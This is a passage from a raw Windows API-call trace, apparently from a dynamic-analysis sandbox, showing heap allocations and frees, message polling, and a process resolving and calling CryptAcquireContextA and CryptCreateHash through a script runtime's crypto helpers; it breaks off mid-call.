returned 0x43ca1c0 [0097.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0097.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0097.559] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.559] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0097.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0097.559] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0097.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0097.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0097.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0097.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0097.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0097.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0097.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0097.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0097.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0097.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0097.560] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e38 | out: hHeap=0x1780000) returned 1 [0097.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0097.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca238 [0097.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0097.560] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0097.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0097.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0097.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0097.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0097.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0097.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0097.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0097.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0097.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0097.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0097.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0097.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0097.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0097.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0097.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0097.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0097.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0097.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0097.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0097.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0097.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0097.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0097.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0097.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0097.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0097.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0097.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0097.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0097.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0097.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0097.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0097.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0097.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0097.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0097.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0097.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0097.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0097.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0097.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0097.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0097.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0097.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0097.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0097.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0097.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0097.563] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0097.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0097.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0097.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0097.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0097.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0097.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0097.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0097.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0097.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0097.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0097.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0097.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0097.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0097.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0097.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0097.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0097.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0097.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0097.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0097.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0097.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0097.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0097.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0097.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0097.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0097.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0097.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0097.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0097.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0097.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0097.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0097.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0097.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0097.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0097.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0097.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0097.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0097.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0097.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0097.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0097.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0097.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0097.565] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0097.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0097.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0097.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0097.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0097.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0097.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0097.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0097.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0097.566] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0097.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0097.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0097.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0097.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797088, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0097.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0097.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0097.566] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0097.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0097.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0097.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0097.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0097.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0097.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0097.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0097.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.566] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0097.566] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0097.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0097.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0097.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0097.567] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0097.568] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0097.569] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.569] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0097.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0097.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0097.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.570] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0097.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0097.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0097.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0097.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0097.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0097.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0097.570] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.570] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0097.570] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0097.570] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0097.570] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0097.570] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.570] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0097.571] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.571] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0097.571] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0097.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, 